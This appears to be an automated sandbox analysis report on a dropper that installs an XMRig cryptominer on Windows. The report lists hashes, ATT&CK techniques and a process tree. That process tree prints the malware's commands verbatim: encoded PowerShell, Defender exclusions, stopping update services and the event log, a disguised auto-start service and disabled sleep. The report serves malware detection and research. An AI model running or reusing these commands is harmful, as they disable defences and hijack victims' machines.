Analysis
-
max time kernel
91s -
max time network
91s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 13:59
Static task
static1
Behavioral task
behavioral1
Sample
19-12-2024_UqVE2XPvW38Pgkj.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
19-12-2024_UqVE2XPvW38Pgkj.zip
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral3
Sample
19-12-2024_UqVE2XPvW38Pgkj.zip
Resource
win11-20241007-en
General
-
Target
19-12-2024_UqVE2XPvW38Pgkj.zip
-
Size
4.3MB
-
MD5
cf356b163f946dc2f16d95febf45a583
-
SHA1
e7c8e964c23f86765d729b82d3140604bb00cb7c
-
SHA256
50d3bf20e1534889385de4b8d780a750c9d37a75c941ffae6dd961caef2eb325
-
SHA512
baa6367011ebda751fe7ef40a49f99e96c5daf19e068b02b2cdf564477f17a792a9dc0887b9723208d0c49d55a7e1c501723643d12fee8c8dcd0d1406e65be2d
-
SSDEEP
98304:YIv1mD5TqdFfK4iBOqWh3tWyfzbgwgGP7OZlGWwCR6t+uWiPBt1KP:YIdmFkF7iMtWKzkwgh1wc6t+cBS
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/2504-140-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2504-142-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2504-141-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2504-139-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2504-137-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2504-136-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2504-143-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1960 powershell.exe 4172 powershell.exe -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts Bootstrapper.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Bootstrapper.exe -
Executes dropped EXE 3 IoCs
pid Process 4916 Bootstrapper.exe 836 Bootstrapper.exe 1808 updater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 40 pastebin.com 41 pastebin.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3364 powercfg.exe 4020 powercfg.exe 4676 powercfg.exe 1136 powercfg.exe 4080 powercfg.exe 1924 powercfg.exe 3616 powercfg.exe 3388 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe Bootstrapper.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1808 set thread context of 4048 1808 updater.exe 163 PID 1808 set thread context of 2504 1808 updater.exe 166 -
resource yara_rule behavioral1/memory/2504-131-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-135-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-140-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-142-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-141-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-139-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-137-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-136-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-134-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-133-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-132-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2504-143-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3240 sc.exe 3676 sc.exe 1972 sc.exe 2032 sc.exe 3976 sc.exe 2772 sc.exe 5020 sc.exe 1268 sc.exe 4556 sc.exe 1508 sc.exe 1976 sc.exe 2488 sc.exe 876 sc.exe 924 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bootstrapper.exe -
Modifies data under HKEY_USERS 50 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 724 powershell.exe 116 powershell.exe 724 powershell.exe 116 powershell.exe 836 Bootstrapper.exe 1960 powershell.exe 1960 powershell.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 836 Bootstrapper.exe 1808 updater.exe 4172 powershell.exe 4172 powershell.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 1808 updater.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeRestorePrivilege 3832 7zFM.exe Token: 35 3832 7zFM.exe Token: SeSecurityPrivilege 3832 7zFM.exe Token: SeDebugPrivilege 724 powershell.exe Token: SeDebugPrivilege 116 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeShutdownPrivilege 4020 powercfg.exe Token: SeCreatePagefilePrivilege 4020 powercfg.exe Token: SeShutdownPrivilege 4676 powercfg.exe Token: SeCreatePagefilePrivilege 4676 powercfg.exe Token: SeShutdownPrivilege 1136 powercfg.exe Token: SeCreatePagefilePrivilege 1136 powercfg.exe Token: SeShutdownPrivilege 4080 powercfg.exe Token: SeCreatePagefilePrivilege 4080 powercfg.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeShutdownPrivilege 1924 powercfg.exe Token: SeCreatePagefilePrivilege 1924 powercfg.exe Token: SeShutdownPrivilege 3616 powercfg.exe Token: SeCreatePagefilePrivilege 3616 powercfg.exe Token: SeShutdownPrivilege 3388 powercfg.exe Token: SeCreatePagefilePrivilege 3388 powercfg.exe Token: SeLockMemoryPrivilege 2504 explorer.exe Token: SeShutdownPrivilege 3364 powercfg.exe Token: SeCreatePagefilePrivilege 3364 powercfg.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3832 7zFM.exe 3832 7zFM.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4916 Bootstrapper.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 4916 wrote to memory of 724 4916 Bootstrapper.exe 105 PID 4916 wrote to memory of 724 4916 Bootstrapper.exe 105 PID 4916 wrote to memory of 724 4916 Bootstrapper.exe 105 PID 4916 wrote to memory of 116 4916 Bootstrapper.exe 107 PID 4916 wrote to memory of 116 4916 Bootstrapper.exe 107 PID 4916 wrote to memory of 116 4916 Bootstrapper.exe 107 PID 4916 wrote to memory of 836 4916 Bootstrapper.exe 109 PID 4916 wrote to memory of 836 4916 Bootstrapper.exe 109 PID 4528 wrote to memory of 2396 4528 cmd.exe 117 PID 4528 wrote to memory of 2396 4528 cmd.exe 117 PID 4804 wrote to memory of 3588 4804 cmd.exe 148 PID 4804 wrote to memory of 3588 4804 cmd.exe 148 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 4048 1808 updater.exe 163 PID 1808 wrote to memory of 2504 1808 updater.exe 166 PID 1808 wrote to memory of 2504 1808 updater.exe 166 PID 1808 wrote to memory of 2504 1808 updater.exe 166 PID 1808 wrote to memory of 2504 1808 updater.exe 166 PID 1808 wrote to memory of 2504 1808 updater.exe 166
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\19-12-2024_UqVE2XPvW38Pgkj.zip"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3832
-
C:\Users\Admin\Desktop\Bootstrapper.exe"C:\Users\Admin\Desktop\Bootstrapper.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAagBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAdABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAG8AcgA6ACAAQwBvAHUAbABkACAAbgBvAHQAIABzAHQAYQByAHQAOgAgAC4ATgBFAFQAIABGAHIAYQBtAGUAdwBvAHIAawAgADQALgA4AC4AMQAgAG4AbwB0ACAAaQBuAHMAdABhAGwAbABlAGQALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbQBxAGcAIwA+AA=="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:724
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAcgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAbQBpACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:836 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2396
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:3240
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2488
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2032
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:876
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:3976
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:924
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:2772
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:1268
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:3676
-
-
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3588
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5020
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4556
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1508
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3364
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4048
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Defense Evasion
Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
17KB
MD516d6a6d4f9980b25fac21ac1bf5e7f28
SHA122ca42c60772c6f6ef2c9e9d3a3b381ce8812e30
SHA256c90c80cb8b7873b73b9b84d70e511cc470ca9a164202fb3464a553850215ddb1
SHA5123e0f38ce56066a0d7911f7355b3593d315cc1bb7512f6d5a7d0208c80cc437b6abcf26d09a7cf54b2f6706cc5c70096dcf359639c134e2b360f4594e2cc7c4f8
-
Filesize
18KB
MD5db7ff37b3ca48d7558281fdf2bc90073
SHA1f5f1b902714e5028be83387ba8f772ce09494715
SHA256a391e9db14e4a9c61fb27982a5f2233c369b3f8949ccf2900322a94dffaab6d3
SHA512abe3c1d14a0093900d695c0f6ad1289c9073159f6e6e134df7506fa5def28bef04f85e1a43e2d7202353837ff384b6da42c10b077b8ef286b29cca91430e65f8
-
Filesize
5.1MB
MD533a6872a056879c6a977599778a1fb0f
SHA1109285b385ce0c21ee8b9624b63104d27a51115e
SHA25679e48350a0712336332571a280272957ffc446c520e70a6e8827169fc84933d4
SHA5127052a4d7e047768d0eb91b316c191aba2eb6247a66c0f39f2fd7e062bbdd31c402734c80b81dc2b144c199ecde2efc25a5afdfce476923a026bf927dff0c0973
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.1MB
MD5d15c24a478c313ede9d4ad03a4164f8a
SHA1aceaa3800a3c042243e39b1235b7c1eef338e90f
SHA25687e35093021944aa354666c0f7b594f4414e2c29a2da69f62a427ed56f91d2b1
SHA5122b373ab102ba01bbb119f2e08daac38cb3f90939be0474c6086eb2d6e64eead65b41b8a818f464248b67973539b5de879844fe4175268ae8db808230480fea40
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62